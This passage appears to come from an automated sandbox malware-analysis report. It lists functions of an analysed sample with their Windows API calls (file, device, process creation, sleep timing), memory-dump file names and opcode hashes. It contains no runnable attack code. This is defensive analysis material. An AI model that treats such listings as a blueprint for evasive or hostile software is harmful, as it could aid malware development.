                                                                                                                                                        • Instruction Fuzzy Hash: E611BB3A200301BFDB15AF74D865EBA77B8FF44350B80902AF807CB2A0EB319951C7A1
                                                                                                                                                        Function 00AD713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AD715C
                                                                                                                                                        • _memset.LIBCMT ref: 00AD717D
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AD71CF
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD71D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1157408455-0
                                                                                                                                                        • Opcode ID: 0a6b94a7e58345f34d3466dcfb2c1533124453ba658e336eac2d251e7401f55b
                                                                                                                                                        • Instruction ID: a1eea2d398c02212db288245066e30354a9717793d2c86a577f2fffaa65fd17a
                                                                                                                                                        • Opcode Fuzzy Hash: 0a6b94a7e58345f34d3466dcfb2c1533124453ba658e336eac2d251e7401f55b
                                                                                                                                                        • Instruction Fuzzy Hash: BD11CA759012287AE7205B65AC4DFEFBABCEF45760F10429AF505E72D0D6744F808BA4
                                                                                                                                                        Function 00AD13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AD13EE
                                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AD1409
                                                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AD141F
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AD1474
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3137044355-0
                                                                                                                                                        • Opcode ID: fb26d6dec7ec11f7900659f6d2e784b1470290a221c8508ede9da261c1e7d72d
                                                                                                                                                        • Instruction ID: 0f7ab863085de54abc81621eefba39c26ef5aaa55135b1ff4cdebd37109aa3f7
                                                                                                                                                        • Opcode Fuzzy Hash: fb26d6dec7ec11f7900659f6d2e784b1470290a221c8508ede9da261c1e7d72d
                                                                                                                                                        • Instruction Fuzzy Hash: C1216AF1A40209BBDB209F95ED88ADABBB8EF00744F40856BE52397250DB74EA44DB51
                                                                                                                                                        Function 00ACC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00ACC285
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC297
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2AD
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2C8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                        • Opcode ID: f65b801152febe986deba83e051a3cd4094f5745c6f3853b03281b4afb29fe50
                                                                                                                                                        • Instruction ID: 7ec8d69bfc31d972248cd528b6f77f3db9ba607f5236cd67fdda0fefc7369a27
                                                                                                                                                        • Opcode Fuzzy Hash: f65b801152febe986deba83e051a3cd4094f5745c6f3853b03281b4afb29fe50
                                                                                                                                                        • Instruction Fuzzy Hash: 5711187A940218FFDB11DBD8C985FDDBBB8FB08710F214095EA05B7294D671AE10DB94
                                                                                                                                                        Function 00AD7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AD7C6C
                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00AD7C9F
                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AD7CB5
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AD7CBC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                        • Opcode ID: 2d3f058c560b3004b3bb8f1f6fe9b31fac9e513a743bfe8602fe999383a9e7a6
                                                                                                                                                        • Instruction ID: d23d223c5b1677fe6d5ac76bb7060dc91802a3384656e42a255cc4ea0e5f191c
                                                                                                                                                        • Opcode Fuzzy Hash: 2d3f058c560b3004b3bb8f1f6fe9b31fac9e513a743bfe8602fe999383a9e7a6
                                                                                                                                                        • Instruction Fuzzy Hash: 04110472A04204BFE7029BA89C08BDE7FADAB04725F144256F926E3391EA708D1487A0
                                                                                                                                                        Function 00AAC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                        • Opcode ID: cd0be9cb3aa1adf8bfc0a764c1109b7f7402ed822e2092e9bc4befdf5b060aa4
                                                                                                                                                        • Instruction ID: 1af8fcf3b5fbfd4bded055472f927dd1aae2d50bd31cadbd5b5d7d7dac921673
                                                                                                                                                        • Opcode Fuzzy Hash: cd0be9cb3aa1adf8bfc0a764c1109b7f7402ed822e2092e9bc4befdf5b060aa4
                                                                                                                                                        • Instruction Fuzzy Hash: 5B118072501659BFEF128FA49C54EEABB69FF0A364F055215FA04531A0DB32DC60DBA0
                                                                                                                                                        Function 00AD49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AD49EE
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00AD4A13
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AD4A1D
                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00AD4A50
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                        • Opcode ID: f34a15d2fe87b273946630412fc20a58bc1c641db69bea542c871593f11091f0
                                                                                                                                                        • Instruction ID: 54a1a73d882b68ad4a2bc1cd9adc1e7410458dd1079ca20a29da7a0843e2c210
                                                                                                                                                        • Opcode Fuzzy Hash: f34a15d2fe87b273946630412fc20a58bc1c641db69bea542c871593f11091f0
                                                                                                                                                        • Instruction Fuzzy Hash: 3F112A71D40528EBCF00EFA5DA89AEEBB74FF09751F414056E946B7250CB309560CBA9
                                                                                                                                                        Function 00AC5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                        • Instruction ID: 5a298768dd01d6d5aa6baef9219668fd4f0b1840d49f09c394f080420d782c13
                                                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                        • Instruction Fuzzy Hash: AA018C3280464EBBCF125F94DD41DEE3F62BF18350B5A8818FE2859031D232DAB1AB81
                                                                                                                                                        Function 00AB80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB869D: __getptd_noexit.LIBCMT ref: 00AB869E
                                                                                                                                                        • __lock.LIBCMT ref: 00AB811F
                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00AB813C
                                                                                                                                                        • _free.LIBCMT ref: 00AB814F
                                                                                                                                                        • InterlockedIncrement.KERNEL32(00DA2408), ref: 00AB8167
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2704283638-0
                                                                                                                                                        • Opcode ID: 910b2c90fc9d8a8876855a3edd1aeb34c53be0121e53a17c76830d72034f0328
                                                                                                                                                        • Instruction ID: 6f64956d71005e35df8e1536d6f6cd76188472f656fa71ccf4583f5c4addfa20
                                                                                                                                                        • Opcode Fuzzy Hash: 910b2c90fc9d8a8876855a3edd1aeb34c53be0121e53a17c76830d72034f0328
                                                                                                                                                        • Instruction Fuzzy Hash: BB01D232942621ABDB11AF6CA94A7DD73BCBF05710F040209F41067293DF389A42DBD6
                                                                                                                                                        Function 00AFDDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFDE07
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFDE1F
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFDE43
                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00AFDE5E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                        • Opcode ID: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                                                                                                                                                        • Instruction ID: 2bf1f4dce0ecf34be92a3cecd4583d36d35a029955a96178d0cacec0216e4ace
                                                                                                                                                        • Opcode Fuzzy Hash: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                                                                                                                                                        • Instruction Fuzzy Hash: E9112DB9D00209EFDB41DFA9C8849EEBBF9FB08310F508166E925E3214DB35AA55CF50
                                                                                                                                                        Function 00AB8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __lock.LIBCMT ref: 00AB8768
                                                                                                                                                          • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                                                                                                                                                          • Part of subcall function 00AB8984: RtlEnterCriticalSection.NTDLL(00AB0127), ref: 00AB89AF
                                                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00AB8775
                                                                                                                                                        • __lock.LIBCMT ref: 00AB8789
                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00AB87A7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1687444384-0
                                                                                                                                                        • Opcode ID: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                                                                                                                                                        • Instruction ID: 5c6e0d6e0a578f4f6a2fa8be79b1cc12f1d3423108042058b74cf60ee96361d6
                                                                                                                                                        • Opcode Fuzzy Hash: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                                                                                                                                                        • Instruction Fuzzy Hash: 0C016D72440B00AFD760EF69D905799F7F8FF40325F20890EE4A9872A2CFB4A680CB01
                                                                                                                                                        Function 00AFE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AFE14D
                                                                                                                                                        • _memset.LIBCMT ref: 00AFE15C
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B53EE0,00B53F24), ref: 00AFE18B
                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00AFE19D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
